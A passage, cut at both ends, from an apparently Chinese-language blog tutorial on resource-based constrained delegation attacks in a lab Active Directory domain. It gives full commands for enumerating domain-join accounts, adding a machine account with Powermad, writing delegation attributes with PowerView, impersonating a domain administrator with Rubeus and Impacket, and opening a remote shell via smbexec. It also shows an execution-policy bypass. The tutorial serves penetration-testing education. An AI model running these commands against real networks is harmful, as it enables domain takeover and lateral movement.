class=\"ez-toc-section-end\"><\/span><\/h4>\n<p>\u5982\u4e0a\u6587\u6240\u8bf4\uff0c\u6211\u4eec\u9700\u8981\u62ff\u4e0b\u52a0\u57df\u8d26\u53f7\u6743\u9650\uff0c\u624d\u6709\u6743\u4fee\u6539<code>msDS-AllowedToActOnBehalfOfOtherIdentity<\/code>\u5c5e\u6027\uff0c\u56e0\u6b64\u7b2c\u4e00\u6b65\u5219\u662f\u786e\u5b9a\u5f53\u524d\u57df\u73af\u5883\u5185\u7684\u52a0\u57df\u8d26\u53f7\u3002<\/p>\n<ul>\n<li>\u67e5\u8be2\u6bcf\u4e2a\u57df\u5185\u8ba1\u7b97\u673a\u662f\u7531\u54ea\u4e2a\u57df\u8d26\u53f7\u52a0\u5165\u57df\u4e2d\u7684\uff1a<\/li>\n<\/ul>\n<pre><code>AdFind.exe  -b &quot;DC=qiuqiu,DC=com&quot; -f &quot;objectClass=computer&quot; mS-DS-CreatorSID<\/code><\/pre>\n<p><img decoding=\"async\" src=\"http:\/\/weizn.net\/wp-content\/uploads\/2026\/05\/post-1002-69fd8d05af003.\" alt=\"\" \/><\/p>\n<ul>\n<li>\u67e5\u8be2SID\u5bf9\u5e94\u7684\u54ea\u4e2a\u57df\u7528\u6237\u540d<\/li>\n<\/ul>\n<pre><code>AdFind.exe -b &quot;DC=qiuqiu,DC=com&quot; -f &quot;(&amp;(objectsid=S-1-5-21-573638044-2771444813-2757395567-1605))&quot; objectclass cn dn<\/code><\/pre>\n<p><img decoding=\"async\" src=\"http:\/\/weizn.net\/wp-content\/uploads\/2026\/05\/post-1002-69fd8d05b6efb.\" alt=\"\" \/><\/p>\n<p>\u53ef\u4ee5\u770b\u5230\u5f53\u524d\u673a\u5668\u7684\u52a0\u57df\u8d26\u53f7\uff0c\u5c31\u662f\u81ea\u5df1\u767b\u9646\u7684\u57df\u7528\u6237\u3002<\/p>\n<ul>\n<li>\n<p>\u67e5\u770b\u52a0\u57df\u8d26\u53f7\u90fd\u52a0\u8fc7\u54ea\u4e9b\u8ba1\u7b97\u673a\u5165\u57df<\/p>\n<p>\u7531\u4e8e\u52a0\u57df\u8d26\u53f7\u53ef\u4ee5\u8bbe\u7f6e\u81ea\u5df1\u6240\u6709\u52a0\u5165\u57df\u8ba1\u7b97\u673a\u7684<code>msDS-AllowedToActOnBehalfOfOtherIdentity<\/code>\u5c5e\u6027\uff0c\u8fd9\u5728\u540e\u7eed\u6a2a\u5411\u5230\u5176\u5b83\u8ba1\u7b97\u673a\u65f6\u662f\u5f88\u6709\u7528\u7684\uff0c\u6240\u4ee5\u901a\u8fc7\u67e5\u8be2\u5f53\u524d\u52a0\u57df\u8d26\u53f7\u4e0b\u7684\u6240\u6709\u8ba1\u7b97\u673a\uff0c\u53ef\u4ee5\u786e\u5b9a\u5bf9\u666e\u901a\u57df\u5185\u8ba1\u7b97\u673a\u7684\u6a2a\u5411\u8303\u56f4\u3002<\/p>\n<ul>\n<li>\n<p>\u9996\u5148\u67e5\u8be2\u6307\u5b9a\u57df\u7528\u6237\u540d\u7684SID<\/p>\n<pre><code>AdFind.exe -default -f \"sAMAccountName=yefan\" objectSid<\/code><\/pre>\n<p><img decoding=\"async\" src=\"http:\/\/weizn.net\/wp-content\/uploads\/2026\/05\/post-1002-69fd8d05be4fc.\" alt=\"\" \/><\/p>\n<\/li>\n<li>\n<p>\u67e5\u770b\u54ea\u4e9b\u8ba1\u7b97\u673a\u662f\u901a\u8fc7\u6b64SID\u7528\u6237\u52a0\u5165\u57df\u4e2d\u7684<\/p>\n<pre><code>AdFind.exe -b \"DC=qiuqiu,DC=com\" -f \"(&(samAccountType=805306369)(mS-DS-CreatorSID=S-1-5-21-573638044-2771444813-2757395567-1605))\" cn sAMAccountType objectCategory<\/code><\/pre>\n<p><img decoding=\"async\" src=\"http:\/\/weizn.net\/wp-content\/uploads\/2026\/05\/post-1002-69fd8d05c71cd.\" alt=\"\" \/><\/p>\n<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<h4><span class=\"ez-toc-section\" id=\"%EF%BC%882%EF%BC%89%E6%B7%BB%E5%8A%A0%E8%AE%A1%E7%AE%97%E6%9C%BA%E8%B4%A6%E5%8F%B7\"><\/span>\uff082\uff09\u6dfb\u52a0\u8ba1\u7b97\u673a\u8d26\u53f7<span class=\"ez-toc-section-end\"><\/span><\/h4>\n<p>\u4f7f\u7528powermad\u5de5\u5177\u6dfb\u52a0\u4e3b\u673a\u8d26\u6237\uff1a<\/p>\n<blockquote>\n<p>\u4e0b\u8f7d\u5730\u5740\uff1a<a href=\"https:\/\/github.com\/Kevin-Robertson\/Powermad\">https:\/\/github.com\/Kevin-Robertson\/Powermad<\/a><\/p>\n<\/blockquote>\n<p>\u4ee5\u5f53\u524d<code>qiuqiu.com\\yefan<\/code>\u7528\u6237\u521b\u5efa\u4e00\u4e2a\u8ba1\u7b97\u673a\u8d26\u6237<code>newserv<\/code>\uff0c\u5bc6\u7801<code>Test1234<\/code><\/p>\n<pre><code>Import-Module .\\Powermad.ps1\n\nNew-MachineAccount -MachineAccount newserv -Password $(ConvertTo-SecureString &quot;Test1234&quot; -AsPlainText -Force)<\/code><\/pre>\n<blockquote>\n<p>\u53ef\u4ee5\u4f7f\u7528.\u8fd0\u7b97\u7b26\u6765\u5bfc\u5165PowerShell\u811a\u672c\uff0c\u8fd9\u6837\u53ef\u4ee5\u907f\u514d\u6267\u884c\u7b56\u7565\u7684\u9650\u5236\uff0c\u4f8b\u5982\uff1a<\/p>\n<pre><code>. .\\powermad.ps1<\/code><\/pre>\n<\/blockquote>\n<p><img decoding=\"async\" src=\"http:\/\/weizn.net\/wp-content\/uploads\/2026\/05\/post-1002-69fd8d05cf4f5.\" alt=\"\" \/><\/p>\n<p>\u67e5\u770b\u8ba1\u7b97\u673a\u8d26\u53f7\u662f\u5426\u6dfb\u52a0\u6210\u529f\uff1a<\/p>\n<pre><code>net group &quot;domain computers&quot; \/do<\/code><\/pre>\n<p><img decoding=\"async\" src=\"http:\/\/weizn.net\/wp-content\/uploads\/2026\/05\/post-1002-69fd8d05d6ca7.\" alt=\"\" \/><\/p>\n<h4><span class=\"ez-toc-section\" id=\"%EF%BC%883%EF%BC%89%E6%9F%A5%E8%AF%A2%E6%96%B0%E5%88%9B%E5%BB%BA%E7%9A%84%E8%AE%A1%E7%AE%97%E6%9C%BA%E8%B4%A6%E5%8F%B7SID\"><\/span>\uff083\uff09\u67e5\u8be2\u65b0\u521b\u5efa\u7684\u8ba1\u7b97\u673a\u8d26\u53f7SID<span class=\"ez-toc-section-end\"><\/span><\/h4>\n<p>\u67e5\u8be2\u4e4b\u524d\u65b0\u521b\u5efa\u7684\u8ba1\u7b97\u673a\u8d26\u53f7SID\uff0c\u76ee\u7684\u662f\u5c06SID\u8bbe\u7f6e\u5230\u59d4\u6d3e\u8d44\u6e90\u7684<code>msDS-AllowedToActOnBehalfofotherIdentity<\/code>\u5c5e\u6027\u4e2d\uff0c\u4f7f\u7528PowerSploit\u5de5\u5177\u5305\u4e2d\u7684powerview\u67e5\u8be2\uff1a<\/p>\n<pre><code>. .\\powerview.ps1\n\nGet-DomainComputer -identity newserv<\/code><\/pre>\n<p><img decoding=\"async\" src=\"http:\/\/weizn.net\/wp-content\/uploads\/2026\/05\/post-1002-69fd8d05e0cb4.\" alt=\"\" \/><\/p>\n<h4><span class=\"ez-toc-section\" id=\"%EF%BC%884%EF%BC%89%E8%AE%BE%E7%BD%AE%E5%A7%94%E6%B4%BE%E5%85%B3%E7%B3%BB\"><\/span>\uff084\uff09\u8bbe\u7f6e\u59d4\u6d3e\u5173\u7cfb<span class=\"ez-toc-section-end\"><\/span><\/h4>\n<p>\u8bbe\u7f6e<code>newserv<\/code>\u5230<code>user1.qiuqiu.com<\/code>\u7684\u59d4\u6d3e\u5173\u7cfb\uff0c\u5177\u4f53\u5c31\u662f\u5728<code>user1.qiuqiu.com<\/code>\u4e0a\u8bbe\u7f6e<code>msDS-AllowedToActOnBehalfofotherIdentity<\/code>\u5c5e\u6027\uff0c\u6307\u5b9a\u5141\u8bb8\u6765\u81ea\u4e8e<code>newserv<\/code>\u7684SID\u7684\u59d4\u6d3e\uff0c\u53ef\u4ee5\u4f7f\u7528powerview\u811a\u672c\u5b9e\u73b0\uff1a<\/p>\n<pre><code>\/\/ \u8ba1\u7b97\u5c5e\u6027\u503c\n$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList &quot;O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-573638044-2771444813-2757395567-1114)&quot;\n$SDBytes=New-Object byte[] ($SD.BinaryLength)\n$SD.GetBinaryForm($SDBytes,0)\n\n\/\/ \u8bbe\u7f6e\u5c5e\u6027\u503c\nGet-DomainComputer user1 | Set-DomainObject -Set @{&#039;msDS-AllowedToActOnBehalfofotherIdentity&#039;=$SDBytes} -Verbose<\/code><\/pre>\n<p><img decoding=\"async\" src=\"http:\/\/weizn.net\/wp-content\/uploads\/2026\/05\/post-1002-69fd8d05eb7a1.\" alt=\"\" \/><\/p>\n<p>\u68c0\u67e5\u59d4\u6d3e\u662f\u5426\u914d\u7f6e\u6210\u529f\uff1a<\/p>\n<pre><code>Get-DomainComputer user1 -Properties msDS-AllowedToActOnBehalfofotherIdentity<\/code><\/pre>\n<p><img decoding=\"async\" src=\"http:\/\/weizn.net\/wp-content\/uploads\/2026\/05\/post-1002-69fd8d05f2fa5.\" alt=\"\" \/><\/p>\n<h4><span class=\"ez-toc-section\" id=\"%EF%BC%885%EF%BC%89%E5%A7%94%E6%B4%BE%E7%89%B9%E6%9D%83%E7%94%A8%E6%88%B7%E5%B9%B6%E8%8E%B7%E5%8F%96%E7%A5%A8%E6%8D%AE\"><\/span>\uff085\uff09\u59d4\u6d3e\u7279\u6743\u7528\u6237\u5e76\u83b7\u53d6\u7968\u636e<span class=\"ez-toc-section-end\"><\/span><\/h4>\n<ul>\n<li>\n<p>\u8ba4\u8bc1\u5e76\u751f\u6210\u673a\u5668\u8d26\u53f7\u7684kerberos\u54c8\u5e0c<\/p>\n<pre><code>Rubeus.exe hash \/user:newserv \/password:Test1234 \/domain:qiuqiu.com<\/code><\/pre>\n<p><img decoding=\"async\" src=\"http:\/\/weizn.net\/wp-content\/uploads\/2026\/05\/post-1002-69fd8d0606abd.\" alt=\"\" \/><\/p>\n<\/li>\n<li>\n<p>\u4f7f\u7528newserv\u59d4\u6d3e\u57df\u7ba1\u8d26\u53f7domain_admin\u83b7\u53d6\u670d\u52a1\u7968\u636e\u5e76\u6ce8\u5165\u5f53\u524d\u4f1a\u8bdd<\/p>\n<pre><code>Rubeus.exe s4u \/user:newserv$ \/rc4:B9E0CFCEAF6D077970306A2FD88A7C0A \/impersonateuser:domain_admin \/msdsspn:cifs\/user1.qiuqiu.com \/ptt<\/code><\/pre>\n<blockquote>\n<p>cifs\u5728\/msdsspn:cifs\/user1.qiuqiu.com\u8fd9\u91cc\u6307\u7684\u662f\u201cCommon Internet File System\u201d\u3002CIFS\u662fSMB(Server Message Block)\u7684\u4e00\u4e2a\u7248\u672c\uff0c\u901a\u5e38\u7528\u4e8e\u6587\u4ef6\u5171\u4eab\u3002<\/p>\n<\/blockquote>\n<\/li>\n<\/ul>\n<p><img decoding=\"async\" src=\"http:\/\/weizn.net\/wp-content\/uploads\/2026\/05\/post-1002-69fd8d0612dcb.\" alt=\"\" \/><\/p>\n<ul>\n<li>\u67e5\u770b\u5f53\u524d\u4f1a\u8bdd\u4e2d\u7f13\u5b58\u7684\u7968\u636e<\/li>\n<\/ul>\n<p><img decoding=\"async\" src=\"http:\/\/weizn.net\/wp-content\/uploads\/2026\/05\/post-1002-69fd8d061c315.\" alt=\"\" \/><\/p>\n<ul>\n<li>\u9a8c\u8bc1\u7968\u636e<br \/>\n\u666e\u901a\u57df\u7528\u6237\u6ca1\u6709\u5176\u5b83\u7528\u6237\u76ee\u5f55\u7684\u8bbf\u95ee\u6743\u9650\uff0c\u8fd9\u91cc\u53ef\u4ee5\u770b\u5230\u5df2\u7ecf\u5177\u5907\u4efb\u610f\u76ee\u5f55\u8bbf\u95ee\u6743\u9650\uff1a<\/li>\n<\/ul>\n<p><img decoding=\"async\" src=\"http:\/\/weizn.net\/wp-content\/uploads\/2026\/05\/post-1002-69fd8d0624f1b.\" alt=\"\" \/><\/p>\n<hr \/>\n<h3><span class=\"ez-toc-section\" id=\"2%E3%80%81%E6%A8%AA%E5%90%91%E5%88%B0%E5%9F%9F%E5%86%85%E5%85%B6%E5%AE%83%E4%B8%BB%E6%9C%BA\"><\/span>2\u3001\u6a2a\u5411\u5230\u57df\u5185\u5176\u5b83\u4e3b\u673a<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<blockquote>\n<p>\u5047\u8bbe\u4e00\u4e2a\u573a\u666f\uff0c\u653b\u51fb\u8005\u5728\u53d6\u5f97\u57df\u5185\u4e00\u4e2a\u8ba1\u7b97\u673a\u6743\u9650\u540e\uff0c\u540c\u65f6\u83b7\u53d6\u5230\u4e86\u52a0\u57df\u8d26\u53f7\u51ed\u636e\uff0c\u800c\u5f53\u524d\u57df\u73af\u5883\u4e0b\u5f88\u591a\u57df\u4e3b\u673a\u516c\u7528\u4e86\u4e00\u4e2a\u52a0\u57df\u8d26\u53f7\u5165\u7f51\uff0c\u5982\u679c\u5728\u6ca1\u6709\u9650\u5236\u7279\u6743\u8d26\u53f7\u80fd\u88ab\u59d4\u6d3e\u7684\u60c5\u51b5\u4e0b\uff0c\u53ef\u80fd\u5bfc\u81f4\u6b64\u52a0\u57df\u8d26\u53f7\u4e0b\u7684\u6240\u6709\u4e3b\u673a\u88ab\u63a7\u3002\u52a0\u57df\u8d26\u53f7\u7684\u51ed\u636e\u83b7\u53d6\u6e20\u9053\u53ef\u80fd\u6709\u4ee5\u4e0b\u65b9\u5f0f\uff1a<\/p>\n<ul>\n<li>IT\u5728\u7ed9\u5f53\u524d\u5931\u9677\u7684\u673a\u5668\u52a0\u5b8c\u57df\u540e\uff0c\u672c\u5730\u4fdd\u5b58\u4e86\u52a0\u57df\u8d26\u53f7\u51ed\u636e<\/li>\n<li>IT\u4e3a\u4e86\u4f7f\u7528\u548c\u4fdd\u5b58\u65b9\u4fbf\uff0c\u4e8e\u662f\u5c06\u52a0\u57df\u8d26\u53f7\u51ed\u636e\u5b58\u653e\u5728\u57df\u5185\u516c\u5171\u5171\u4eab\u76ee\u5f55\u4e2d\uff0c\u5982\u57df\u63a7sysvol\u76ee\u5f55<\/li>\n<li>IT\u5728\u7ed9\u65b0\u673a\u5668\u52a0\u57df\u65f6\uff0c\u4e00\u822c\u4f1a\u6709\u52a0\u57df\u5de5\u5177\uff0c\u91cc\u9762\u53ef\u80fd\u786c\u7f16\u7801\u4e86\u52a0\u57df\u8d26\u53f7\u51ed\u636e<\/li>\n<\/ul>\n<\/blockquote>\n<p><strong>\u6d4b\u8bd5\u73af\u5883\uff1a<\/strong><br \/>\n\u5df2\u77e5\u516c\u5171\u52a0\u57df\u8d26\u53f7\uff1aadd_domain \/ Test1234<\/p>\n<table>\n<thead>\n<tr>\n<th>\u4e3b\u673a\u540d<\/th>\n<th>\u4e3b\u673aIP<\/th>\n<th>\u4e3b\u673a\u8d26\u6237<\/th>\n<th>\u4e3b\u673a\u63cf\u8ff0<\/th>\n<\/tr>\n<\/thead>\n<tbody>\n<tr>\n<td>dc-main-1.qiuqiu.com<\/td>\n<td>10.10.10.10<\/td>\n<td>qiuqiu.com\\domain_admin<\/td>\n<td>DC<\/td>\n<\/tr>\n<tr>\n<td>user1.qiuqiu.com<\/td>\n<td>10.100.0.6<\/td>\n<td>qiuqiu.com\\yefan<\/td>\n<td>\u666e\u901a\u57df\u5185\u673a\u5668\uff0c\u88ab\u653b\u51fb\u8005\u63a7\u5236\uff0c\u901a\u8fc7add_domain\u8d26\u53f7\u52a0\u57df<\/td>\n<\/tr>\n<tr>\n<td>user2.qiuqiu.com<\/td>\n<td>10.100.0.7<\/td>\n<td>qiuqiu.com\\yehei<\/td>\n<td>\u666e\u901a\u57df\u5185\u673a\u5668\uff0c\u901a\u8fc7add_domain\u52a0\u57df<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<h4><span class=\"ez-toc-section\" id=\"%EF%BC%881%EF%BC%89%E5%89%8D%E7%BD%AE%E5%B7%A5%E4%BD%9C%E6%B5%81%E7%A8%8B\"><\/span>\uff081\uff09\u524d\u7f6e\u5de5\u4f5c\u6d41\u7a0b<span class=\"ez-toc-section-end\"><\/span><\/h4>\n<p>\u524d\u7f6e\u5de5\u4f5c\u4e0e\u4e4b\u524d\u6e17\u900f\u6d41\u7a0b\u4e00\u81f4\uff0c\u9700\u8981\u7ecf\u8fc7\u4ee5\u4e0b\u6b65\u9aa4\uff1a<\/p>\n<ul>\n<li>\u67e5\u770b\u5f53\u524d\u52a0\u57df\u8d26\u53f7\u4e0b\u603b\u5171\u6709\u591a\u5c11\u673a\u5668\u662f\u7531\u5b83\u52a0\u5165\u57df\u7684<\/li>\n<li>\u5728\u57df\u5185\u6dfb\u52a0\u4e00\u4e2a\u8ba1\u7b97\u673a\u8d26\u53f7<code>newserv<\/code>\u7528\u4e8e\u4f5c\u4e3a\u59d4\u6d3e\u7528\u6237<\/li>\n<li>\u67e5\u8be2\u51fa\u65b0\u521b\u5efa\u7684\u8ba1\u7b97\u673a\u8d26\u53f7<code>newserv<\/code>\u7684SID\uff0c\u7528\u4e8e\u540e\u7eed\u8bbe\u7f6e\u5728\u59d4\u6d3e\u8d44\u6e90\u7684<code>msDS-AllowedToActOnBehalfOfOtherIdentity<\/code>\u5c5e\u6027\u4e2d<\/li>\n<\/ul>\n<h4><span class=\"ez-toc-section\" id=\"%EF%BC%882%EF%BC%89%E8%8E%B7%E5%8F%96%E5%8A%A0%E5%9F%9F%E8%B4%A6%E5%8F%B7%E7%9A%84TGT\"><\/span>\uff082\uff09\u83b7\u53d6\u52a0\u57df\u8d26\u53f7\u7684TGT<span class=\"ez-toc-section-end\"><\/span><\/h4>\n<p>\u7531\u4e8e\u4fee\u6539<code>msDS-AllowedToActOnBehalfOfOtherIdentity<\/code>\u5c5e\u6027\u9700\u8981\u52a0\u57df\u8d26\u53f7\u6743\u9650\uff0c\u800c\u5f53\u524d\u673a\u5668\u4e0a\u5e76\u6ca1\u6709\u52a0\u57df\u8d26\u53f7\u7684\u7968\u636e\uff0c\u56e0\u6b64\u9700\u8981\u5148\u5411KDC\u7533\u8bf7\uff0c\u5e76\u6ce8\u5165\u5230\u5f53\u524d\u4f1a\u8bdd\u4e2d\u3002<\/p>\n<pre><code>Rubeus.exe asktgt \/user:add_domain  \/password:Test1234 \/domain:qiuqiu.com \/ptt<\/code><\/pre>\n<p><img decoding=\"async\" src=\"http:\/\/weizn.net\/wp-content\/uploads\/2026\/05\/post-1002-69fd8d0635970.\" alt=\"\" \/><\/p>\n<p><img decoding=\"async\" src=\"http:\/\/weizn.net\/wp-content\/uploads\/2026\/05\/post-1002-69fd8d063ec7b.\" alt=\"\" \/><\/p>\n<h4><span class=\"ez-toc-section\" id=\"%EF%BC%883%EF%BC%89%E8%AE%BE%E7%BD%AE%E5%A7%94%E6%B4%BE%E5%85%B3%E7%B3%BB%E5%88%B0%E7%9B%AE%E6%A0%87%E8%B5%84%E6%BA%90\"><\/span>\uff083\uff09\u8bbe\u7f6e\u59d4\u6d3e\u5173\u7cfb\u5230\u76ee\u6807\u8d44\u6e90<span class=\"ez-toc-section-end\"><\/span><\/h4>\n<p>\u672c\u5730\u6ce8\u5165\u52a0\u57df\u8d26\u53f7\u7684TGT\u540e\uff0c\u5f53\u524d\u673a\u5668\u5c31\u62e5\u6709\u4e86\u4fee\u6539user2\u8ba1\u7b97\u673a\u7684\u59d4\u6d3e\u5c5e\u6027\uff0c\u5411<code>user2.qiuqiu.com<\/code>\u7684<code>msDS-AllowedToActOnBehalfOfOtherIdentity<\/code>\u4e2d\u5199\u5165<code>newserv<\/code>\u7684SID\u7684\u59d4\u6d3e\u6743\u9650\uff1a<\/p>\n<pre><code>\/\/ \u8ba1\u7b97\u5c5e\u6027\u503c\n$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList &quot;O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-573638044-2771444813-2757395567-1114)&quot;\n$SDBytes=New-Object byte[] ($SD.BinaryLength)\n$SD.GetBinaryForm($SDBytes,0)\n\n\/\/ \u8bbe\u7f6e\u5c5e\u6027\u503c\nGet-DomainComputer user2 | Set-DomainObject -Set @{&#039;msDS-AllowedToActOnBehalfofotherIdentity&#039;=$SDBytes} -Verbose<\/code><\/pre>\n<p><img decoding=\"async\" src=\"http:\/\/weizn.net\/wp-content\/uploads\/2026\/05\/post-1002-69fd8d06476c7.\" alt=\"\" \/><\/p>\n<h4><span class=\"ez-toc-section\" id=\"%EF%BC%884%EF%BC%89%E5%A7%94%E6%B4%BE%E7%89%B9%E6%9D%83%E7%94%A8%E6%88%B7%E5%B9%B6%E8%8E%B7%E5%8F%96%E7%A5%A8%E6%8D%AE\"><\/span>\uff084\uff09\u59d4\u6d3e\u7279\u6743\u7528\u6237\u5e76\u83b7\u53d6\u7968\u636e<span class=\"ez-toc-section-end\"><\/span><\/h4>\n<ul>\n<li>\n<p>\u8ba4\u8bc1\u5e76\u751f\u6210<code>newserv<\/code>\u673a\u5668\u8d26\u53f7\u7684kerberos\u54c8\u5e0c<\/p>\n<pre><code>Rubeus.exe hash \/user:newserv \/password:Test1234 \/domain:qiuqiu.com<\/code><\/pre>\n<p><img decoding=\"async\" src=\"http:\/\/weizn.net\/wp-content\/uploads\/2026\/05\/post-1002-69fd8d0606abd.\" alt=\"\" \/><\/p>\n<\/li>\n<li>\n<p>\u4f7f\u7528newserv\u59d4\u6d3e\u57df\u7ba1\u8d26\u53f7domain_admin\u83b7\u53d6\u670d\u52a1\u7968\u636e\u5e76\u6ce8\u5165\u5f53\u524d\u4f1a\u8bdd<\/p>\n<pre><code>Rubeus.exe s4u \/user:newserv$ \/rc4:B9E0CFCEAF6D077970306A2FD88A7C0A \/impersonateuser:domain_admin \/msdsspn:cifs\/user2.qiuqiu.com \/ptt<\/code><\/pre>\n<\/li>\n<\/ul>\n<p><img decoding=\"async\" src=\"http:\/\/weizn.net\/wp-content\/uploads\/2026\/05\/post-1002-69fd8d065afc5.\" alt=\"\" \/><\/p>\n<p>\u73b0\u5728user1\u5177\u5907\u4e86\u5230<code>cifs\/user2.qiuqiu.com<\/code>\u7684\u670d\u52a1\u7968\u636e<br \/>\n<img decoding=\"async\" src=\"http:\/\/weizn.net\/wp-content\/uploads\/2026\/05\/post-1002-69fd8d06663c4.\" alt=\"\" \/><\/p>\n<ul>\n<li>\n<p>\u8bbf\u95ee<code>user2.qiuqiu.com<\/code>\u7684\u670d\u52a1<br \/>\n\u6ce8\u610f\u8981\u4f7f\u7528\u4e3b\u673a\u540d\u8bbf\u95ee\uff0c\u4e0d\u8981\u4f7f\u7528ip\u8bbf\u95ee\u3002<\/p>\n<ul>\n<li>\u5efa\u7acbipc$\u4f1a\u8bdd\uff1a\n<pre><code>net use \\\\user2.qiuqiu.com\\ipc$ \/user:qiuqiu.com\\domain_admin<\/code><\/pre>\n<\/li>\n<\/ul>\n<p><img decoding=\"async\" src=\"http:\/\/weizn.net\/wp-content\/uploads\/2026\/05\/post-1002-69fd8d066f99c.\" alt=\"\" \/><\/p>\n<ul>\n<li>\u8bbf\u95eeuser2\u9ed8\u8ba4\u5171\u4eab\u76ee\u5f55\n<pre><code>dir \\\\user2.qiuqiu.com\\c$<\/code><\/pre>\n<\/li>\n<\/ul>\n<p><img decoding=\"async\" src=\"http:\/\/weizn.net\/wp-content\/uploads\/2026\/05\/post-1002-69fd8d0678d0f.\" alt=\"\" \/><\/p>\n<ul>\n<li>\u4f7f\u7528Impacket\u5de5\u5177\u5305\u8bf7\u6c42ST\u7968\u636e\u5e76\u8fdc\u7a0b\u6267\u884c\u547d\u4ee4<\/li>\n<\/ul>\n<pre><code>\/\/ \u8ba4\u8bc1\u673a\u5668\u8d26\u53f7\u5e76\u59d4\u6d3e\u57df\u7ba1\u8d26\u53f7\u5411KDC\u7533\u8bf7\u5230\u76ee\u6807\u4e3b\u673a\u7684ST\u7968\u636e\ngetST.py qiuqiu.com\/newserv\\$:Test1234 -spn CIFS\/user2.qiuqiu.com -dc-ip 10.10.10.10 -impersonate domain_admin\n\n\/\/ \u5c06ST\u7968\u636e\u6587\u4ef6\u8bbe\u7f6e\u4e3a\u73af\u5883\u53d8\u91cf\nset KRB5CCNAME=domain_admin.ccache\n\n\/\/ \u901a\u8fc7smb\u8fdc\u7a0b\u83b7\u53d6\u4ea4\u4e92\u5f0fshell\nsmbexec.py -k -no-pass user2.qiuqiu.com<\/code><\/pre>\n<p><img decoding=\"async\" src=\"http:\/\/weizn.net\/wp-content\/uploads\/2026\/05\/post-1002-69fd8d0681041.\" alt=\"\" \/><\/p>\n<\/li>\n<\/ul>\n<hr \/>\n<h3><span class=\"ez-toc-section\" id=\"3%E3%80%81%E5%BC%BA%E5%88%B6%E8%AE%A4%E8%AF%81%E5%A7%94%E6%B4%BE%E6%8E%A5%E7%AE%A1%E5%9F%9F%E6%8E%A7\"><\/span>3\u3001\u5f3a\u5236\u8ba4\u8bc1+\u59d4\u6d3e\u63a5\u7ba1\u57df\u63a7<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<blockquote>\n<p>\u7531\u4e8e\u4fee\u6539<code>msDS-AllowedToActOnBehalfOfOtherIdentity<\/code>\u5c5e\u6027\u53ea\u80fd\u662f\u5f53\u524d\u8ba1\u7b97\u673a\u7684\u52a0\u57df\u8d26\u53f7\uff0c\u6216\u8005\u5f53\u524d\u8ba1\u7b97\u673a\u8d26\u53f7\u6709\u6743\u9650\uff0c\u5982\u679c\u60f3\u901a\u8fc7RBCD\u653b\u51fb\u62ff\u4e0b\u57df\u63a7\uff0c\u5c31\u9700\u8981\u83b7\u53d6\u57df\u7ba1\u6216\u8005\u57df\u63a7\u673a\u5668\u8d26\u53f7\u7684\u6743\u9650\uff0c\u8fd9\u4e24\u4e2a\u8d26\u53f7\u7684\u51ed\u636e\u4e00\u822c\u65e0\u6cd5\u76f4\u63a5\u62ff\u5230\uff0c\u4f46\u53ef\u4ee5\u5229\u7528\u57df\u63a7\u7684\u5f3a\u5236\u8ba4\u8bc1\u6f0f\u6d1e\uff0c\u8ba9\u57df\u63a7\u4f7f\u7528\u81ea\u8eab\u7684\u673a\u5668\u8d26\u53f7\uff0c\u4e3b\u52a8\u53d1\u8d77\u8ba4\u8bc1\u5230\u653b\u51fb\u8005\u4e3b\u673a\uff0c\u7136\u540e\u653b\u51fb\u8005\u4e3b\u673a\u53ef\u4ee5\u4e2d\u7ee7\u6b64\u8d26\u53f7\u6743\u9650\u5230\u5176\u5b83\u57df\u63a7\uff0c\u5b8c\u6210\u5bf9\u57df\u63a7<code>msDS-AllowedToActOnBehalfOfOtherIdentity<\/code>\u5c5e\u6027\u7684\u4fee\u6539\u3002<\/p>\n<\/blockquote>\n<p><strong>\u6d4b\u8bd5\u73af\u5883\uff1a<\/strong><\/p>\n<table>\n<thead>\n<tr>\n<th>\u4e3b\u673a\u540d<\/th>\n<th>\u4e3b\u673aIP<\/th>\n<th>\u4e3b\u673a\u8d26\u6237<\/th>\n<th>\u4e3b\u673a\u63cf\u8ff0<\/th>\n<\/tr>\n<\/thead>\n<tbody>\n<tr>\n<td>dc-main-1.qiuqiu.com<\/td>\n<td>10.10.10.10<\/td>\n<td>qiuqiu.com\\domain_admin<\/td>\n<td>\u4e3b\u57df<\/td>\n<\/tr>\n<tr>\n<td>dc-backup-1.qiuqiu.com<\/td>\n<td>10.10.10.11<\/td>\n<td>qiuqiu.com\\domain_admin<\/td>\n<td>\u5907\u57df<\/td>\n<\/tr>\n<tr>\n<td>user1.qiuqiu.com<\/td>\n<td>10.100.0.6<\/td>\n<td>qiuqiu.com\\yefan<\/td>\n<td>\u666e\u901a\u57df\u5185\u673a\u5668\uff0c\u88ab\u653b\u51fb\u8005\u63a7\u5236<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<h4><span class=\"ez-toc-section\" id=\"%EF%BC%881%EF%BC%89%E6%B7%BB%E5%8A%A0%E8%AE%A1%E7%AE%97%E6%9C%BA%E8%B4%A6%E5%8F%B7\"><\/span>\uff081\uff09\u6dfb\u52a0\u8ba1\u7b97\u673a\u8d26\u53f7<span class=\"ez-toc-section-end\"><\/span><\/h4>\n<p>\u7528\u4e8e\u59d4\u6d3e\u5176\u5b83\u7528\u6237\uff1a<\/p>\n<pre><code>. .\\Powermad.ps1\n\nNew-MachineAccount -MachineAccount newserv -Password $(ConvertTo-SecureString &quot;Test1234&quot; -AsPlainText -Force)<\/code><\/pre>\n<p><img decoding=\"async\" src=\"http:\/\/weizn.net\/wp-content\/uploads\/2026\/05\/post-1002-69fd8d068a842.\" alt=\"\" 